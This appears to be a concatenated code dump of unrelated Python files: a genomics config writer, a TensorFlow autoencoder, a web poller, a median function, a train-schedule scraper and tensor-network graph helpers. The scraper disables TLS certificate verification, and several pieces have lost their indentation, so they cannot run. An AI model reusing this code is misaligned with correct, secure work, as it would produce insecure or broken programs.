# NOTE(review): bare except swallows the original OSError details; consider
# `except OSError as e` and chaining it into the raised Exception.
except:
    raise Exception("Cannot create output directory "
                    "at: {}".format(args.outputDir))
os.makedirs(args.outputDir + "slurm_logs/")
# WRITE CONFIGURATION FILE -----------------------------------------------------
sampleFileFormat = \
singleEndSampleSheetHeaders if args.layout == 'single' \
else pairedEndSampleSheetHeaders
sampleFileReader = csv.DictReader(open(args.sampleSheet), delimiter=',')
dictStore = {}
for line in sampleFileReader:
for field in sampleFileFormat:
if field not in line:
raise Exception("Sample file as invalid format.")
if line["SAMPLE"] not in dictStore:
dictStore[line["SAMPLE"]] = {}
if line["REPLICATE"] not in dictStore[line["SAMPLE"]]:
dictStore[line["SAMPLE"]][line["REPLICATE"]] = {}
if line["LIBRARY"] not in dictStore[line["SAMPLE"]][line["REPLICATE"]]:
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]] = {}
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]] = {}
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["R1"] = line["R1"]
if args.layout == "paired":
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["R2"] = line["R2"]
readTag = "\'@RG\\tID:{0}\\tLB:{1}\\tPL:{2}\\tSM:{3}\'".\
format(line["SAMPLE"] + "_" + line["REPLICATE"],
line["LIBRARY"], "ILLUMINA", line["LANE"])
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["rgTag"] = readTag
dictStorePrint = {}
dictStorePrint["samples"] = dictStore
# PRINT COHORT STRUCTURE -------------------------------------------------------
with open(args.outputDir + "config.yaml", "w") as outFile:
outFile.write("# --- CHIP-seq pipeline configuration file ---\n")
outFile.write("config: {}config.yaml\n".format(args.outputDir))
outFile.write("outputDir: {}\n".format(args.outputDir))
outFile.write("execDir: {}\n".format(args.execDir))
outFile.write("sampleSheet: {}\n".format(args.sampleSheet))
outFile.write("slurmLogs: {}\n".format(args.outputDir + "slurm_logs/"))
outFile.write("layout: {}\n".format(args.layout))
outFile.write("genome: {}\n".format(args.genome))
outFile.write(yaml.dump(dictStorePrint))
|
15,792 | 9ab2105856eeb91c8c36a75aa91e2e761bccb3dd | import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2DTranspose, Input, Bidirectional, InputLayer, Conv2D, Dense, \
BatchNormalization, LeakyReLU, Activation, Dropout, Concatenate, ZeroPadding2D, Reshape, RepeatVector, Flatten, \
Lambda
import tensorflow.keras.backend as K
from skimage.metrics import structural_similarity as ssim
def PartEncoderModel(shape_size, n_layers, ef_dim=32, z_dim=128):
    """Build a convolutional encoder: (n_layers - 1) stride-2 conv blocks
    that double the channel count each step, followed by a sigmoid-activated
    z_dim projection and a flatten. Returns a Keras Sequential model.
    Assumes shape_size is an HWC image shape, e.g. (64, 64, 1) — see __main__.
    """
    model = Sequential()
    out_channels = ef_dim
    for i in range(n_layers - 1):
        # Only the first layer carries input_shape so Keras can build the model.
        if i == 0:
            model.add(ZeroPadding2D(input_shape=shape_size))
        else:
            model.add(ZeroPadding2D())
        model.add(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
        model.add(BatchNormalization(momentum=0.1))
        model.add(LeakyReLU(alpha=0.02))
        out_channels = out_channels * 2
    # Final projection to the latent width, squashed to (0, 1).
    model.add(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
    model.add(Activation('sigmoid'))
    model.add(Flatten())
    return model
def PartEncoderModelConditional(shape_size, n_layers, class_size, ef_dim=32, z_dim=128):
    """Class-conditional variant of PartEncoderModel: embeds a one-hot class
    vector (size class_size) into an extra H x W x 1 plane, concatenates it
    with the image input, then applies the same conv stack.
    Returns a functional Model with inputs [image, class_vector].
    """
    x1 = Input(shape=shape_size)
    x2 = Input(shape=(class_size, ))
    dim1 = shape_size[0]
    dim2 = shape_size[1]
    units = dim1 * dim2
    # Project the class vector up to one value per pixel, reshape to a plane.
    x3 = Dense(units, activation='relu')(x2)
    x = Dense(units, activation='relu')(x3)
    x = Reshape((dim1, dim2, 1))(x)
    x = Concatenate()([x1, x])
    layers = []
    out_channels = ef_dim
    for i in range(n_layers - 1):
        # NOTE(review): both branches are identical; the i == 0 case was
        # presumably meant to differ (cf. PartEncoderModel's input_shape).
        if i == 0:
            layers.append(ZeroPadding2D())
        else:
            layers.append(ZeroPadding2D())
        layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
        layers.append(BatchNormalization(momentum=0.1))
        layers.append(LeakyReLU(alpha=0.02))
        out_channels = out_channels * 2
    layers.append(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
    layers.append(Activation('sigmoid'))
    layers.append(Flatten())
    for l in layers:
        x = l(x)
    return Model(inputs=[x1, x2], outputs=x)
def PartReconstructModel(n_layers, f_dim, z_dim):
    """Build the RGB reconstruction decoder: reshape a z_dim latent vector to
    1x1 spatial, then upsample with stride-2 transposed convolutions, halving
    channels each step down to 3 (RGB), with a final sigmoid.
    """
    in_channels = z_dim
    out_channels = f_dim * (2 ** (n_layers - 2))
    layers = []
    layers.append(Reshape((1, 1, in_channels), input_shape=(in_channels,)))
    layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=1))
    for i in range(n_layers - 1):
        out_channels = out_channels // 2
        # Last upsampling step emits the 3 RGB channels.
        if i == n_layers - 2:
            out_channels = 3
        layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
        layers.append(LeakyReLU(alpha=0.02))
        # Every other step adds a refinement convolution at the same width.
        if i % 2 == 0:
            layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=1))
            layers.append(LeakyReLU(alpha=0.02))
    layers.append(Activation('sigmoid'))
    rgb_reconstruct = Sequential(layers)
    return rgb_reconstruct
def PartReconstructModelConditional(n_layers, f_dim, z_dim, class_size):
    """Conditional decoder: from a z_dim latent vector produces BOTH a
    class_size softmax prediction (small MLP head) and the upsampled RGB
    reconstruction (same conv-transpose stack as PartReconstructModel).
    Returns Model(latent -> [class_probs, rgb_image]).
    """
    in_channels = z_dim
    out_channels = f_dim * (2 ** (n_layers - 2))
    x = Input(shape=(in_channels,))
    # Classification head on the raw latent.
    d_1 = Dense(40)(x)
    d_1 = LeakyReLU()(d_1)
    d_1 = Dense(40)(d_1)
    d_1 = LeakyReLU()(d_1)
    d_1 = Dense(class_size, activation='softmax')(d_1)
    # Reconstruction branch (mirrors PartReconstructModel).
    layers = []
    layers.append(Reshape((1, 1, in_channels)))
    layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=1))
    for i in range(n_layers - 1):
        out_channels = out_channels // 2
        if i == n_layers - 2:
            out_channels = 3
        layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
        layers.append(LeakyReLU(alpha=0.02))
        if i % 2 == 0:
            layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=1))
            layers.append(LeakyReLU(alpha=0.02))
    layers.append(Activation('sigmoid'))
    x_2 = x
    for l in layers:
        x_2 = l(x_2)
    return Model(inputs=x, outputs=[d_1, x_2])
def PartClassifierModel(shape_size, n_layers, ef_dim=32, z_dim=128):
    """Build a 10-way image classifier: the same conv trunk as
    PartEncoderModel (LeakyReLU instead of sigmoid at the bottleneck)
    followed by a small dense head with a softmax over 10 classes.
    """
    model = Sequential()
    out_channels = ef_dim
    for i in range(n_layers - 1):
        if i == 0:
            model.add(ZeroPadding2D(input_shape=shape_size))
        else:
            model.add(ZeroPadding2D())
        model.add(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
        model.add(BatchNormalization(momentum=0.1))
        model.add(LeakyReLU(alpha=0.02))
        out_channels = out_channels * 2
    model.add(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
    model.add(LeakyReLU())
    model.add(Flatten())
    # Dense classification head; 10 output classes is hard-coded here.
    model.add(Dense(60))
    model.add(LeakyReLU())
    model.add(Dense(30))
    model.add(LeakyReLU())
    model.add(Dense(10, activation='softmax'))
    return model
def PartDecoderModel(n_layers, f_dim, z_dim):
    """Build an implicit-field decoder over (latent, 2-D point) inputs:
    a dense stack with skip connections (the input is re-concatenated before
    every hidden layer) ending in a single sigmoid occupancy value.
    Input width is z_dim + 2, i.e. the latent code plus an (x, y) point.
    The commented nn.* lines are the original PyTorch version kept for
    reference.
    """
    in_channels = z_dim + 2
    out_channels = f_dim * (2 ** (n_layers - 2))
    x = Input(shape=(in_channels,))
    layers = []
    for i in range(n_layers - 1):
        if i > 0:
            in_channels += z_dim + 2
        # Dropout only on the first few layers.
        if i < 4:
            l = [Dense(out_channels), Dropout(rate=0.4), LeakyReLU()]
            # model.append([nn.Linear(in_channels, out_channels), nn.Dropout(p=0.4), nn.LeakyReLU()])
        else:
            l = [Dense(out_channels), LeakyReLU()]
            # model.append([nn.Linear(in_channels, out_channels), nn.LeakyReLU()])
        in_channels = out_channels
        out_channels = out_channels // 2
        layers.append(Sequential(l))
    l = [Dense(1), Activation('sigmoid')]
    layers.append(Sequential(l))
    # Wire the stack with input skip connections.
    out = layers[0](x)
    for i in range(1, n_layers - 1):
        out = layers[i](Concatenate(axis=1)([out, x]))
    out = layers[n_layers - 1](out)
    return Model(inputs=x, outputs=out)
    # model.append([nn.Linear(in_channels, 1), nn.Sigmoid()])
class PartAE(tf.keras.Model):
    """Part autoencoder: a conv encoder to a z_dim latent and an upsampling
    RGB reconstruction head. With is_class_conditioning=True the encoder
    also takes a 10-way class vector and the head additionally returns a
    class prediction.
    NOTE(review): the `decoder` attribute is commented out below, but the
    __main__ block still calls model.decoder.summary(), which raises
    AttributeError.
    """
    def __init__(self, input_shape, en_n_layers=5, ef_dim=32, de_n_layers=5, df_dim=32, z_dim=128, is_class_conditioning=False):
        super(PartAE, self).__init__()
        self.z_dim = z_dim
        if is_class_conditioning==False:
            self.encoder = PartEncoderModel(input_shape, en_n_layers, ef_dim, z_dim)
        else:
            # 10 classes hard-coded for the conditional variant.
            self.encoder = PartEncoderModelConditional(input_shape, en_n_layers, 10, ef_dim, z_dim)
        # self.decoder = PartDecoderModel(de_n_layers, df_dim, z_dim)
        if is_class_conditioning==False:
            self.reconstruct = PartReconstructModel(de_n_layers, df_dim, z_dim)
        else:
            self.reconstruct = PartReconstructModelConditional(de_n_layers, df_dim, z_dim, 10)
        self.class_conditioning = is_class_conditioning
        # print(self.encoder.outputs[0].shape)
    def call(self, x):
        # Unconditional: x is a single image batch; conditional: x is
        # presumably [image, class_vector] — confirm against the encoder.
        if self.class_conditioning == False:
            encoded_out = self.encoder(x)
            reconstruct_out = self.reconstruct(encoded_out)
            return reconstruct_out
        else:
            encoded_out = self.encoder(x)
            classifier_out, reconstruct_out = self.reconstruct(encoded_out)
            return reconstruct_out, classifier_out
        # print(reconstruct_out.shape)
        # encoded_out = tf.expand_dims(encoded_out, axis=1)
        # encoded_out = tf.tile(encoded_out, multiples=(1, x[1].shape[1], 1))
        # encoded_out = tf.reshape(encoded_out, shape=(-1, self.z_dim))
        # point_input = tf.reshape(x[1], (-1, x[1].shape[2]))
        # concat_out = tf.concat([encoded_out, point_input], axis=1)
        # out = self.decoder(concat_out)
        # out = tf.reshape(out, shape=(x[0].shape[0], x[1].shape[1], -1))
        # print(out.shape)
# print(reconstruct_out.shape)
def custom_loss(y_true, y_pred):
    """Masked MSE: y_true packs the RGB target in its first 3 channels and a
    binary mask in the last channel; the squared error is averaged only over
    masked pixels. NOTE(review): the print() calls are debug leftovers that
    fire on every loss evaluation.
    """
    y_recon = y_true[:, :, :, :-1]
    # Broadcast the single-channel mask over the 3 RGB channels.
    y_mask = tf.expand_dims(y_true[:, :, :, -1], axis=3)
    y_mask = tf.tile(y_mask, [1, 1, 1, 3])
    print(y_mask.shape)
    print(y_recon.shape)
    print(y_pred.shape)
    loss = K.square(y_recon - y_pred) * y_mask
    return tf.reduce_sum(loss) / tf.reduce_sum(y_mask)
def custom_ssim(y_true, y_pred):
    """SSIM loss (1 - mean SSIM) between the prediction and the RGB part of
    y_true (mask channel stripped). NOTE(review): the mask is built but not
    applied — the masking line is commented out — and the print() calls are
    debug leftovers.
    """
    y_recon = y_true[:, :, :, :-1]
    y_mask = tf.expand_dims(y_true[:, :, :, -1], axis=3)
    y_mask = tf.tile(y_mask, [1, 1, 1, 3])
    print(y_mask.shape)
    print(y_recon.shape)
    print(y_pred.shape)
    #y_pred = y_pred * y_mask
    loss = tf.reduce_mean(tf.image.ssim(y_pred, y_recon, 1.0))
    return 1.0 - loss
if __name__ == "__main__":
tf.config.experimental_run_functions_eagerly(True)
# model = PartImNetAE(6, 32, 6, 32, 138)
model = PartAE((64, 64, 1), en_n_layers=5, de_n_layers=5)
print(model.encoder.summary())
print(model.decoder.summary())
print(model.reconstruct.summary())
# print(model.summary())
# model = PartDecoderModel(32, 5, 5, 32, 128)
# print(model.decoder.summary())
x = tf.random.normal(shape=(32, 64, 64, 1)) # masks
y = tf.random.normal(shape=(32, 5, 2)) # points taken from 0-1
gt_point = tf.random.normal(shape=(32, 5, 1)) # classification for every image-point pair
gt_reconstruct = tf.random.normal((32, 64, 64, 3)) # rgb reconstruct for image
gt_reconstruct_final = tf.concat([gt_reconstruct, x], 3)
print(gt_reconstruct_final.shape)
print(model.encoder.inputs)
model.compile(loss=[custom_loss, 'mse'], optimizer='adam')
model.fit(x=[x, y], y=[gt_reconstruct_final, gt_point], epochs=2)
model.save_weights('model_partae.h5')
# out = model([x, y])
# print(out)
|
15,793 | 7eb4cbc353cff89f24ec5b1bb91aef4120ae88f6 | from cumulusci.robotframework.pageobjects import ListingPage
from cumulusci.robotframework.pageobjects import pageobject
from BaseObjects import BaseNPSPPage
from NPSP import npsp_lex_locators
@pageobject("Listing", "General_Accounting_Unit__c")
class GAUListPage(BaseNPSPPage, ListingPage):
def _is_current_page(self):
"""
Waits for the current page to be a Data Import list view
"""
self.selenium.wait_until_location_contains("/list",timeout=60, message="Records list view did not load in 1 min")
self.selenium.location_should_contain("General_Accounting_Unit__c",message="Current page is not a DataImport List view")
|
15,794 | e39073ee0f044586559ea8619f9613f186861fd9 | #epic
import requests, time
# Poll the Epic Games Store front page every 10 seconds until it responds
# with HTTP 200, then announce it (message below: "Epic is ready to give
# away freebies") and stop.
while True:
    r = requests.get('https://www.epicgames.com/store/ru/')
    print(r)
    # NOTE(review): the sleep runs before the status check, so even the
    # first successful response is delayed by 10 seconds.
    time.sleep(10)
    if r.status_code == 200:
        print("Епик готов раздавать халяву")
        break
input() |
15,795 | 4424dc0375e7bbc5e419524d95cb0364428e5d87 | from nose.tools import assert_equal
def median(arr1, arr2):
    """Return the median of the merged contents of two sorted lists.

    Assumes len(arr1) == len(arr2) >= 1 (the merged length is even, so the
    median is the mean of the two middle elements).
    """
    i = j = k = 0
    # Advance through the virtual merge until the two middle elements
    # ('before' and 'current') have been seen.
    while k < len(arr1) + 1:
        if k > 0:
            before = current
        # BUG FIX: guard j against running past arr2 — the original indexed
        # arr2[j] unconditionally and raised IndexError once arr2 was
        # exhausted (e.g. median([10, 20], [1, 2])).
        if i < len(arr1) and (j >= len(arr2) or arr1[i] < arr2[j]):
            current = arr1[i]
            i += 1
        else:
            current = arr2[j]
            j += 1
        k += 1
    return (before + current) / 2
class medianTest:
    """Ad-hoc test harness for the median function above.
    Relies on nose's assert_equal (imported on this file's truncated first
    line); nose is unmaintained — plain asserts or pytest would do the same.
    """
    def test(self, func):
        # func: a callable with the same signature/contract as median().
        assert_equal(func([1, 12, 15, 26, 38], [2, 13, 17, 30, 45]), 16)
        assert_equal(func([1, 10, 13, 15], [2, 4, 6, 7]), 6.5)
        assert_equal(func([1, 2], [4, 5]), 3)
        print("TESTS PASSED")
t = medianTest()
t.test(median) |
15,796 | 8958392de2b0a36dc2c63a642fb09d31ad168a2c | import pandas
import ssl
import json
import sqlite3
#ignore ssl certificate exams
ctx=ssl.create_default_context()
ctx.check_hostname=False
ctx.verify_mode=ssl.CERT_NONE
# ALGORITHM:
# CREATE DATABASE TABLE FOR SCHEDULES
# FETCH TRAINS FROM DATABASE IN LOOP
# VISIT THAT URL AND GET THE SCHEDULE IN TABLE
# CONVERT TO JSON
# SAVE THE JSON DATA TO DATABASE
# CREATE A JOIN QUERY SO AS TO DEMONSTRATE THAT THE RECORDS HAVE BEEN SAVED OR NOT (OPTIONAL)
#*********************CREATE DATABASE********************************************************
conn=sqlite3.connect('train.sqlite')
cur=conn.cursor()
#cur.execute("DROP TABLE IF EXISTS Schedules")
cur.execute('''CREATE TABLE IF NOT EXISTS Schedules(
tr_number INTEGER NOT NULL,
st_code TEXT,
arrival_daytime TEXT,
dept_daytime TEXT,
distance_km INTEGER)''')
#*******************MAIN PROCESS LOOP********************************************************
trno=input('enter train num:')
url="https://etrain.info/in?TRAIN="+str(trno)
tables=pandas.read_html(url)
print(tables[14])
inp=input("enter y or n? ")
if inp=='y':
tablesjson=tables[14].to_json(orient="records")
info=json.loads(tablesjson)
#print(json.dumps(info, indent=4))
for i in range(2,len(info)-1):
cur.execute('INSERT INTO Schedules(tr_number,st_code,arrival_daytime,dept_daytime,distance_km) VALUES (?,?,?,?,?)',
(trno,info[i]["1"],info[i]["3"],info[i]["4"],info[i]["5"]))
print(trno,info[i]["1"],info[i]["3"],info[i]["4"],info[i]["5"])
conn.commit()
else: print("ok!")
|
15,797 | d8befbf3e19f8acebd809ac1763bcb4df33c9382 |
s = set(['admin', 'cc', 'dd', '33'])
print s
print 'admin' in s
|
15,798 | 7f1c64ca3c405012c4e05a1d2186f81183a18b3d | #!/usr/bin/env python
#from sets import Set
import sys, math
def find_all_path_pool(g, start, end, pool=None, path=None):
    """Depth-first search for Hamiltonian paths from `start` to `end`,
    driven by an explicit, shared pool of frontier nodes.

    g maps node -> list of adjacent nodes. Returns a list of paths (each a
    list of nodes) that visit every node of g exactly once.
    NOTE(review): because `pool` is shared (and consumed) across sibling
    recursive calls, the result can depend on set pop order — confirm this
    pooling behaviour is intended.
    """
    # Avoid the mutable default arguments of the original (set([]) / []);
    # None-sentinels are backward compatible.
    if pool is None:
        pool = set()
    if path is None:
        path = []
    path = path + [start]
    if start == end:
        # Only accept complete (Hamiltonian) paths.
        if len(path) == len(g):
            return [path]
        return []
    # dict.has_key() was removed in Python 3; `in` works in both.
    if start not in g:
        return []
    paths = []
    path_nodes = set(path)
    new_nodes = set(g[start]) - path_nodes
    pool = pool | new_nodes
    if len(pool) == 0:
        return []
    while len(pool) > 0:
        node = pool.pop()
        newpaths = find_all_path_pool(g, node, end, pool, path)
        for newpath in newpaths:
            paths.append(newpath)
    return paths
def find_all_path(g, start, end, path=None):
    """Depth-first search for all Hamiltonian paths from `start` to `end`.

    g maps node -> list of adjacent nodes. Returns a list of paths (each a
    list of nodes) that visit every node of g exactly once.
    """
    # Avoid the mutable default argument of the original (path=[]).
    if path is None:
        path = []
    path = path + [start]
    if start == end:
        # Only accept complete (Hamiltonian) paths.
        if len(path) == len(g):
            return [path]
        return []
    # dict.has_key() was removed in Python 3; `in` works in both.
    if start not in g:
        return []
    paths = []
    for node in g[start]:
        if node not in path:
            newpaths = find_all_path(g, node, end, path)
            for newpath in newpaths:
                paths.append(newpath)
    return paths
def gnode(gmera):
    """Build a node-adjacency graph from a tensor network description.

    gmera maps tensor name -> list of leg ids; two tensors are adjacent iff
    they share a leg id. Returns {tensor: [adjacent tensors]} with every key
    of gmera present (possibly mapping to an empty list).
    """
    g = {}
    for k in gmera.keys():
        # dict.has_key() was removed in Python 3; `in` works in both.
        if k not in g:
            g[k] = []
        for leg in gmera[k]:
            for kp in gmera.keys():
                if kp != k:
                    if (leg in gmera[kp]) and (kp not in g[k]):
                        g[k].append(kp)
    return g
def contract_gmera(gmera, path, pr= False):
    """Simulate contracting the tensors of `gmera` in the order given by
    `path`, tracking leg counts via set symmetric differences.

    Returns (max_leg, max_comp, cost) where max_leg is the largest number of
    open legs at any intermediate step, max_comp the largest open+contracted
    leg count, and cost sums base**comp per step (base = 100, i.e. a
    bond-dimension-100 cost model). Returns (-1, -1) if legs remain open
    after the full contraction. Python 2 only (print statements).
    """
    if pr:
        print path
    # Contract the first two tensors: SS = shared legs, St = remaining open legs.
    S1 = set(gmera[path[0]])
    S2 = set(gmera[path[1]])
    SS = S1&S2
    St = (S1|S2)-SS
    max_leg = len(St)
    max_comp = len(St)+len(SS)
    base = 100.
    cost = 0.
    if pr:
        print S1, S2
        print str(path[1])+',', len(St), len(St)+len(SS), St
    # Fold in the remaining tensors one at a time.
    for p in path[2:]:
        S1 = St
        S2 = set(gmera[p])
        SS = S1&S2
        St = (S1|S2)-SS
        comp = len(St)+len(SS)
        max_leg = max(max_leg, len(St))
        max_comp = max(max_comp, comp)
        cost = cost + math.pow(base, comp)
        if pr:
            print str(p)+',', len(St), len(St)+len(SS), St
    # A complete contraction must leave no open legs.
    if len(St) != 0:
        print St
        return -1,-1
    return max_leg, max_comp, cost
def GC2GE(gc):
    """Number the edges of a connection graph.

    gc maps node -> list of link descriptors; slot i of a node and the
    matching descriptor on the partner node refer to the same physical
    edge, so both sides receive the same edge number.

    Returns (ge, gm) where
      ge maps (node, slot) -> [link descriptor, edge number]
      gm maps node -> list of edge numbers, one per slot.

    Fixes: py2-only ``has_key`` replaced by ``in``; ``print "error"``
    parenthesized (identical output on py2 and py3).
    """
    ge = {}
    gm = {}
    ne = 0  # running edge counter
    for node in gc.keys():
        i = 0
        gm[node] = []
        for edge in gc[node]:
            i += 1
            if (node, i) in ge:
                # Same slot seen twice: the input graph is inconsistent.
                print("error")
            if edge not in ge:
                # First time this edge is encountered: fresh number.
                ne += 1
                ge[(node, i)] = [edge, ne]
                gm[node].append(ne)
            else:
                # Partner side already numbered this edge: reuse it.
                ge[(node, i)] = [edge, ge[edge][1]]
                gm[node].append(ge[edge][1])
    return ge, gm
def check_graph(g):
    """Verify that every link in g is mirrored by its partner node.

    For slot e of node k pointing at (v0, v1), the partner's entry
    g[v0][v1-1] must point back at node k.  Only the node name is
    cross-checked; the slot number stored on the partner side is read
    but not verified.

    Returns True when consistent, False otherwise; inconsistencies are
    also reported on stdout.

    Fix: py2-only print statement replaced by a single-string print()
    with identical output on both Python versions.
    """
    res = True
    for k in g.keys():
        e = 0
        for v in g[k]:
            e += 1
            nk, ne = g[v[0]][v[1] - 1]
            if k != nk:
                res = False
                print('graph not consistent %s %s %s %s' % (k, e, nk, ne))
    return res
def Add_Graph(gx1, gx2):
    """Merge two edge-graphs that share boundary nodes.

    Keys present in both graphs act as glue: they are dropped from the
    result, and every leg that pointed at a shared key is rewired to
    whatever the *other* graph attached at that slot.  Keys unique to
    one graph keep their entries (rewired where needed).
    """
    left_keys = set(gx1.keys())
    right_keys = set(gx2.keys())
    shared = left_keys & right_keys
    merged = {}
    for key in right_keys - left_keys:
        rewired = []
        for link in gx2[key]:
            if link[0] in shared:
                # Follow through the glue node into the other graph.
                rewired.append(gx1[link[0]][link[1] - 1])
            else:
                rewired.append(link)
        merged[key] = rewired
    for key in left_keys - right_keys:
        rewired = []
        for link in gx1[key]:
            if link[0] in shared:
                rewired.append(gx2[link[0]][link[1] - 1])
            else:
                rewired.append(link)
        merged[key] = rewired
    return merged
def Simplify_Graph(g):
    """Run the full simplification pipeline on graph g: remove identity
    nodes, cancel U/Up pairs, cancel three-leg W/Wp pairs, then gather
    the operator nodes into a combined 'OO' node."""
    return Simplify_Graph_O(
        Simplify_Graph_W3(
            Simplify_Graph_U(
                Simplify_Graph_I(g))))
def Combine_OO(g1,g2):
    """Fuse two graphs that each carry a combined operator node 'OO'.

    The two 'OO' nodes become a single one whose legs are laid out as
    [first-half legs of g1, first-half legs of g2, second-half legs of
    g1, second-half legs of g2]; leg1/leg2 translate old leg numbers
    into this fused layout.  Every other node is copied with its 'OO'
    references renumbered.

    Python 2 only (xrange; integer '/' -- assumes each 'OO' leg count is
    even).  Assumes at most ~100 legs per 'OO' (fixed-size tables).
    """
    ng = {}
    o1 = g1['OO']
    o2 = g2['OO']
    # Translation tables: old leg number -> leg number on the fused node.
    leg1 = [0]*100
    leg2 = [0]*100
    len1 = len(o1)/2
    len2 = len(o2)/2
    # g1's legs keep their first-half positions; its second half shifts
    # past g2's first half.
    for i in xrange(1, len1+1):
        leg1[i] = i
        leg1[i+len1] = i+len1+len2
    # g2's legs slot in after g1's on each half.
    for i in xrange(1, len2+1):
        leg2[i] = i+len1
        leg2[i+len2] = i+len1*2+len2
    # Build the fused 'OO' entry in the interleaved half-by-half order.
    noo = []
    for i in xrange(0, len1):
        noo.append(o1[i])
    for i in xrange(0, len2):
        noo.append(o2[i])
    for i in xrange(len1, len1+len1):
        noo.append(o1[i])
    for i in xrange(len2, len2+len2):
        noo.append(o2[i])
    ng['OO'] = noo
    # Copy g1's other nodes, renumbering any leg that targets 'OO'.
    for k in g1.keys():
        if k == "OO": continue
        noo = []
        oo = g1[k]
        for kk in oo:
            if kk[0] == 'OO':
                nleg = leg1[kk[1]]
                noo.append((kk[0],nleg))
            else:
                noo.append(kk)
        ng[k] = noo
    # Same for g2's nodes (keys are assumed disjoint from g1's apart
    # from 'OO' -- a clash would silently overwrite; TODO confirm).
    for k in g2.keys():
        if k == "OO": continue
        noo = []
        oo = g2[k]
        for kk in oo:
            if kk[0] == 'OO':
                nleg = leg2[kk[1]]
                noo.append((kk[0],nleg))
            else:
                noo.append(kk)
        ng[k] = noo
    return ng
# ng = g
# I_V = set([])
# nng = {}
# for k in ng.keys():
# if k == "OO":
# ks = "OO"
# s = "0"
# else:
# ks,s = k.split("_", 1)
# if (ks == "OO"):
# s = True
# for v in ng[k]:
# if v[0] != k:
# s = False
# break
# if not s:
# nng[k] = ng[k]
# else:
# nng[k] = ng[k]
# nk = []
# for k in nng.keys():
# if k == "OO":
# ks = "OO"
# e = "0"
# else:
# ks,e = k.split("_",1)
# if ks == "OO":
# nk.append(k)
# nk.sort(cmp)
# i = 0
# l = len(nk)
# gv = {}
# ov = [(0,0)]*2*l
# for k in nk:
# i+= 1
# nv = [("OO", i,), ("OO", i+l)]
# gv[k] = nv
# ov[i-1] = (k, 1)
# ov[i+l-1] = (k,2)
# gv["OO"] = ov
#
# return Add_Graph(gv, nng)
def Simplify_Graph_O(g):
    """Gather every operator node ("O_<n>") into one combined node "OO".

    Operator nodes that connect only to themselves are dropped.  The
    survivors are ordered by numeric suffix and each contributes two
    legs to the new "OO" node (legs i and i+l for the i-th of l
    operators); Add_Graph then rewires the surrounding network onto
    "OO", eliminating the individual O nodes.

    Every key must contain "_" (e.g. "W_3"); a bare key such as "OO"
    would make the split below raise ValueError (same as the original).

    Fix: ``nk.sort(cmp)`` is Python-2-only; sorting with an equivalent
    numeric-suffix ``key=`` preserves the ordering and works on both
    Python versions.
    """
    nng = {}
    for k in g.keys():
        ks, s = k.split("_", 1)
        if ks == "O":
            # Keep the operator only if it has at least one external
            # link; fully self-looping operators are discarded.
            external = False
            for v in g[k]:
                if v[0] != k:
                    external = True
                    break
            if external:
                nng[k] = g[k]
        else:
            nng[k] = g[k]
    # Surviving operator nodes, ordered by their numeric suffix (same
    # order the old cmp() comparator produced).
    nk = [k for k in nng.keys() if k.split("_", 1)[0] == "O"]
    nk.sort(key=lambda name: int(name.split("_", 1)[1]))
    l = len(nk)
    gv = {}
    ov = [(0, 0)] * 2 * l
    i = 0
    for k in nk:
        i += 1
        gv[k] = [("OO", i), ("OO", i + l)]
        ov[i - 1] = (k, 1)
        ov[i + l - 1] = (k, 2)
    gv["OO"] = ov
    return Add_Graph(gv, nng)
def cmp(k1, k2):
    """Comparator ordering node names of the form "name_<n>" by their
    numeric suffix (negative / zero / positive like a classic cmp).

    NOTE: shadows the Python 2 builtin ``cmp``; the name is kept because
    Simplify_Graph_O passes it to ``list.sort``.
    """
    suffix_a = int(k1.split("_", 1)[1])
    suffix_b = int(k2.split("_", 1)[1])
    return suffix_a - suffix_b
def Simplify_Graph_W3(g):
    """Cancel every W_<tag>/Wp_<tag> pair whose first three W legs land
    on Wp legs 2-4: such a pair contracts to an identity, so it is
    replaced (via Add_Graph) by a temporary I node joining Wp leg 1 to
    W leg 4, which Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "W":
            continue
        partner = "Wp_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        n3, e3 = ng[node][2]
        if (n1, e1, n2, e2, n3, e3) == (partner, 2, partner, 3, partner, 4):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "Wp_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (partner, 4), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2), (node, 3)],
            ident: [(partner, 1), (node, 4)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_W4(g):
    """Cancel every W_<tag>/Wp_<tag> pair whose first four W legs land
    on Wp legs 2-5: the pair contracts to an identity, replaced (via
    Add_Graph) by a temporary I node joining Wp leg 1 to W leg 5 that
    Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "W":
            continue
        partner = "Wp_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        n3, e3 = ng[node][2]
        n4, e4 = ng[node][3]
        if (n1, e1, n2, e2, n3, e3, n4, e4) == \
                (partner, 2, partner, 3, partner, 4, partner, 5):
